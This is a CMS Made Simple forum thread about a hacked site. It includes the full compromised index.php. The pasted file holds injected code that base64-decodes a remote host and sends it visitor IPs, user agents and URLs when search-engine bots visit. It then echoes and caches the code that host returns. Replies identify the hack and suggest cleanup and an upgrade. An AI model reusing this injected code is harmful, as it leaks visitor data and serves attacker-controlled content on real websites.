Website Main Page Generating "Site Down for Maintenance"

[RJ19]

Hi,

I am new to this forum and CMS but I am trying to help a friend who has had a fully functional website for many years now but recently he noticed the below output when going to the web address. This is the full page and the error, where it seems it lies, is highlighted in bold. PHP is new to me but I can provide some info such as his version of CMS is 1.2.2 I believe. Now the part of the below that states to run a CHMOD command using to "777" to modify permissions, is that a generic response for a fix or something that is going to resolve the issue?

Thanks for your time.

#CMS - CMS Made Simple #(c)2004 by Ted Kulp (wishy@users.sf.net) #This project's homepage is: http://cmsmadesimple.sf.net # #This program is free software; you can redistribute it and/or modify #it under the terms of the GNU General Public License as published by #the Free Software Foundation; either version 2 of the License, or #(at your option) any later version. # #This program is distributed in the hope that it will be useful, #but WITHOUT ANY WARRANTY; without even the implied warranty of #MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #GNU General Public License for more details. #You should have received a copy of the GNU General Public License #along with this program; if not, write to the Free Software #Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA # #$Id: index.php 4217 2007-10-07 15:13:13Z wishy $ $dirname = dirname(__FILE__); require_once($dirname.'/fileloc.php'); /** * Entry point for all non-admin pages * * @package CMS */ #echo ''; #var_dump($_SERVER); #echo ''; $starttime = microtime(); @ob_start(); clearstatcache(); if (!isset($_SERVER['REQUEST_URI']) && isset($_SERVER['QUERY_STRING'])) { $_SERVER['REQUEST_URI'] = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING']; } if (!file_exists(CONFIG_FILE_LOCATION) || filesize(CONFIG_FILE_LOCATION) < 800) { require_once($dirname.'/lib/misc.functions.php'); if (FALSE == is_file($dirname.'/install/index.php')) { die ('There is no config.php file or install/index.php please correct one these errors!'); } else { redirect('install/'); } } else if (file_exists(TMP_CACHE_LOCATION.'/SITEDOWN')) { echo "

Site down for maintenance.
"; exit; } if (!is_writable(TMP_TEMPLATES_C_LOCATION) || !is_writable(TMP_CACHE_LOCATION)) { echo ''; echo '

The following directories must be writable by the web server:
'; echo 'tmp/cache
'; echo 'tmp/templates_c
'; echo '

Please correct by executing:
chmod 777 tmp/cache
chmod 777 tmp/templates_c
or the equivilent for your platform before continuing.
'; echo ''; exit; } require_once($dirname.'/include.php'); #Makes gCms object if ($config["debug"] == true) { @ini_set('display_errors',1); @error_reporting(E_ALL); } $params = array_merge($_GET, $_POST); $smarty = &$gCms->smarty; $smarty->params = $params; $page = ''; if (isset($params['mact'])) { $ary = explode(',', cms_htmlentities($params['mact']), 4); $smarty->id = (isset($ary[1])?$ary[1]:''); } else { $smarty->id = (isset($params['id'])?intval($params['id']):''); } if (isset($smarty->id) && isset($params[$smarty->id . 'returnid'])) { $page = $params[$smarty->id . 'returnid']; } else if (isset($config["query_var"]) && $config["query_var"] != '' && isset($_GET[$config["query_var"]])) { $page = $_GET[$config["query_var"]]; //trim off the extension, if there is one set if ($config['page_extension'] != '' && endswith($page, $config['page_extension'])) { $page = substr($page, 0, strlen($page) - strlen($config['page_extension'])); } } else { $calced = cms_calculate_url(); if ($calced != '') $page = $calced; } //See if our page matches any predefined routes $page = rtrim($page, '/'); if (strpos($page, '/') !== FALSE) { $routes =& $gCms->variables['routes']; $matched = false; foreach ($routes as $route) { $matches = array(); if (preg_match($route->regex, $page, $matches)) { //Now setup some assumptions if (!isset($matches['id'])) $matches['id'] = 'cntnt01'; if (!isset($matches['action'])) $matches['action'] = 'defaulturl'; if (!isset($matches['inline'])) $matches['inline'] = 0; if (!isset($matches['returnid'])) $matches['returnid'] = ''; #Look for default page if (!isset($matches['module'])) $matches['module'] = $route->module; //Get rid of numeric matches foreach ($matches as $key=>$val) { if (is_int($key)) { unset($matches[$key]); } else { if ($key != 'id') $_REQUEST[$matches['id'] . $key] = $val; } } //Now set any defaults that might not have been in the url if (isset($route->defaults) && count($route->defaults) > 0) { foreach ($route->defaults as $key=>$val) { $_REQUEST[$matches['id'] . $key] = $val; if (array_key_exists($key, $matches)) { $matches[$key] = $val; } } } //Get a decent returnid if ($matches['returnid'] == '') { global $gCms; $contentops =& $gCms->GetContentOperations(); $matches['returnid'] = $contentops->GetDefaultPageID(); } $_REQUEST['mact'] = $matches['module'] . ',' . $matches['id'] . ',' . $matches['action'] . ',' . $matches['inline']; $page = $matches['returnid']; $smarty->id = $matches['id']; $matched = true; } } if (!$matched) { $page = substr($page, strrpos($page, '/') + 1); } } if ($page == '') { global $gCms; $contentops =& $gCms->GetContentOperations(); $page =& $contentops->GetDefaultContent(); } else { $page = preg_replace('/\variables['pageinfo'] =& $pageinfo; if( isset($pageinfo->template_encoding) && $pageinfo->template_encoding != '' ) { set_encoding($pageinfo->template_encoding); } $gCms->variables['content_id'] = $pageinfo->content_id; $gCms->variables['page'] = $page; $gCms->variables['page_id'] = $page; $gCms->variables['page_name'] = $pageinfo->content_alias; $gCms->variables['position'] = $pageinfo->content_hierarchy; global $gCms; $contentops =& $gCms->GetContentOperations(); $gCms->variables['friendly_position'] = $contentops->CreateFriendlyHierarchyPosition($pageinfo->content_hierarchy); $smarty->assign('content_id', $pageinfo->content_id); $smarty->assign('page', $page); $smarty->assign('page_id', $page); $smarty->assign('page_name', $pageinfo->content_alias); $smarty->assign('page_alias', $pageinfo->content_alias); $smarty->assign('posion', $pageinfo->content_hierarchy); $smarty->assign('friendly_position', $gCms->variables['friendly_position']); } else if (get_site_preference('enablecustom404') == '' || get_site_preference('enablecustom404') == "0") { ErrorHandler404(); exit; } $html = ''; $cached = ''; if (isset($_GET["print"])) { ($smarty->is_cached('print:'.$page, '', $pageinfo->template_id)?$cached="":$cached="not "); $html = $smarty->fetch('print:'.$page, '', $pageinfo->template_id) . "\n"; } else { #If this is a case where a module doesn't want a template to be shown, just disable caching if (isset($smarty->id) && $smarty->id != '' && isset($_REQUEST[$smarty->id.'showtemplate']) && $_REQUEST[$smarty->id.'showtemplate'] == 'false') { $html = $smarty->fetch('template:notemplate') . "\n"; } else { $smarty->caching = false; $smarty->compile_check = true; ($smarty->is_cached('template:'.$pageinfo->template_id)?$cached="":$cached="not "); $html = $smarty->fetch('template:'.$pageinfo->template_id) . "\n"; } } #if ((get_site_preference('enablecustom404') == '' || get_site_preference('enablecustom404') == "0") && (!$config['debug'])) #{ # set_error_handler($old_error_handler); #} if (!$cached) { #Perform the content postrendernoncached callback reset($gCms->modules); while (list($key) = each($gCms->modules)) { $value =& $gCms->modules[$key]; if ($gCms->modules[$key]['installed'] == true && $gCms->modules[$key]['active'] == true) { $gCms->modules[$key]['object']->ContentPostRenderNonCached($html); } } //Events::SendEvent('Core', 'ContentPostRenderNonCached', array(&$html)); } #Perform the content postrender callback reset($gCms->modules); while (list($key) = each($gCms->modules)) { $value =& $gCms->modules[$key]; if ($gCms->modules[$key]['installed'] == true && $gCms->modules[$key]['active'] == true) { $gCms->modules[$key]['object']->ContentPostRender($html); } } Events::SendEvent('Core', 'ContentPostRender', array('content' => &$html)); header("Content-Type: " . $gCms->variables['content-type'] . "; charset=" . (isset($pageinfo->template_encoding) && $pageinfo->template_encoding != ''?$pageinfo->template_encoding:get_encoding())); $html = str_replace('','',$html); $html = str_replace('','',$html); echo $html; function g($sr, $fe) { $fp = fsockopen($sr, 80, $errno, $errstr, 15); if (!$fp) {echo 'skterr';} else { $out = "GET $fe HTTP/1.0\r\n"; $out .= "Host: $sr\r\n\r\n"; fwrite($fp, $out); $tmp = ''; while (!feof($fp)) { $tmp .= fgets($fp, 1024);} fclose($fp); return $tmp; }} $u = urlencode($_SERVER['REQUEST_URI']); $a = urlencode($_SERVER['HTTP_USER_AGENT']); $c = 'tmp/cache/'; if (strpos($a,'google') !== false) $c .= 'g_'.md5($u); elseif (strpos($a,'msnbot') !== false) $c .= 'm_'.md5($u); elseif (strpos($a,'yahoo') !== false) $c .= 'y_'.md5($u); if ($c != 'tmp/cache/') { if (file_exists($c)) list($lastTime,$code) = explode('<:::>',gzinflate(file_get_contents($c))); if (!isset($lastTime) || !isset($code) || $lastTime < ($_SERVER['REQUEST_TIME'] - rand(3600,14400))) { $d = base64_decode('MTQxNS5pbg=='); $f = base64_decode('L2EucGhwP2Q9'); $h = str_replace('www.', '', $_SERVER['HTTP_HOST']); $i = $_SERVER['REMOTE_ADDR']; $p = $h.'&u='.$u.'&a='.$a.'&i='.$i; $code = trim(strstr(g($d, "$f$p"), "\r\n\r\n")); echo $code; $fp = fopen($c, "w"); fwrite($fp, gzdeflate($_SERVER['REQUEST_TIME'].'<:::>'.$code)); fclose($fp); } else echo $code; } echo "\n\n\n"; @ob_flush(); $endtime = microtime(); $db =& $gCms->GetDb(); if ($config["debug"] == true) { echo "

Generated in ".microtime_diff($starttime,$endtime)." seconds by CMS Made Simple using ".(isset($db->query_count)?$db->query_count:'')." SQL queries and ".(function_exists('memory_get_usage')?memory_get_usage():'n/a')." bytes of memory
"; } echo "\n"; #echo "

Generated in ".microtime_diff($starttime,$endtime)." seconds by CMS Made Simple (".$cached."cached) using ".(isset($db->query_count)?$db->query_count:'')." SQL queries and ".(function_exists('memory_get_usage')?memory_get_usage():'n/a')." bytes of memory
"; echo "\n"; if (get_site_preference('enablesitedownmessage') == "1" || $config['debug'] == true) { $smarty->clear_compiled_tpl(); #$smarty->clear_all_cache(); } if ($config["debug"] == true) { #$db->LogSQL(false); // turn off logging # output summary of SQL logging results #$perf = NewPerfMonitor($db); #echo $perf->SuspiciousSQL(); #echo $perf->ExpensiveSQL(); #echo $sql_queries; foreach ($gCms->errors as $error) { echo $error; } } # vim:ts=4 sw=4 noet ?>

[Jos]

hmmm... seen the same issue here:
http://forum.cmsmadesimple.org/viewtopi ... 1&p=258221

[uniqu3]

If there were no changes in your hosts settings recently first thing i would do is looking at index.php file.
Download fresh copy of CMSMS version that is in use http://dev.cmsmadesimple.org/project/files/6 and compare files.

If you spot any difference it might be a good chance that it got hacked.

1.2.2 is stone age version, upgrade is highly recommmended.

[RJ19]

Thanks for the link to a similar post and also for your thoughts as to what to do. My friend's web hosting company stated that the index.php file has been "compromised", which obviously sounds like "hacked" to me. If I overwrite just the index.php file, will that affect any of his page content or should I just upgrade CMS and have all of the generic .php files get created again and upload his webpage content from scratch?

I will make sure to let my friend know about locking down his account as a friend of his is the one who helped him put together the website content. Not sure if he accessed it and screwed things up purposely....

[uniqu3]

Overwriting index.php shouldn't affect your content, but you should check the rest of the setup, as if index.php has been compromised then there could be more files on your webspace that do not belong there.

[replytomk3]

Overwrite with the correct version.

Download whole site by FTP.

Scan those files with Avast!

[RJ19]

As far as accessing everything via FTP, can I find the host address to access the content from the web server via an FTP client and also is the username and pw something generic or would it have had to be owner-specific for the creator of the website? I checked the hyperlink at the bottom of your post but maybe I missed what I need as I was searching for it...

[replytomk3]

As far as accessing everything via FTP, can I find the host address to access the content from the web server via an FTP client and also is the username and pw something generic or would it have had to be owner-specific for the creator of the website? I checked the hyperlink at the bottom of your post but maybe I missed what I need as I was searching for it...

You are asking questions that your hosting provider is being paid to be able to answer.

[gingercat]

Just for the record I had the same hack done to a couple of my CMSMS sites today on a windows server.

Easy enough to fix but IO would really like to know how it was done.

[uniqu3]

@gingercat
With your information provided there isn't much we can answer.
Your CMSMS Version is?
Your last update was?
Other Software that may have vulnerability issues installed?
What did you do for overall security?
And so on...

To find where or what happend check you server access and error logs, there might be an answer to your question.
If you can't access these ask your Host provider, it's what they are paid for.

[RJ19]

Apologies on my last post, I just wasn't thinking straight. I am well on my way to finishing downloading all the files from the web server via Secure FTP (SFTP) and I have been reading that upgrading the version of CMS should be done in order since my friend has an ancient version (1.2.2). I am clear on getting the zipped files but I was wondering if there would be any reason I should not upgrade all the way to version 1.9.4.1.2. Basically I am asking if there could be anything with the way his website currently is that would not play well with that most up-to-date version of CMS.

Thanks for your time.

[replytomk3]

PHP version.

[uniqu3]

Well you should probably also look at used module and how far these are supported.

[RJ19]

I just came across a bit of a snag. The step I am at shows the below but I am not getting anywhere when I use the below URL and inserting the domain name to upgrade the version of CMS. I did locate an install directory via FTP but I am not sure if the root folder it is within is correct (/LP folder). Plus this step does not say what to do next if the "Install" directory is not created..

After uploading of new files check if directory install is created. If so enter in the address bar of your browser http://www.yourdomain.com/install/upgrade.php. This will automatically update your database to the newest version. Do not forget to delete directory install after upgrade.

Thanks.

[gingercat]

@gingercat
With your information provided there isn't much we can answer.
Your CMSMS Version is?
Your last update was?
Other Software that may have vulnerability issues installed?
What did you do for overall security?
And so on...

CMSMS ver = 1.9.3
Server = Win 2003 & is currently up to date
Web Server = IIS
PHP = 5.2.9

3 CMSMS sites o nthe server were hacked.

the site files are not writable over IIS but are writable via FTP - I still cant' work out how they managed to edit the file tho. I have made index.php read only now. Its a crude fix I know but it should prevent this happening again.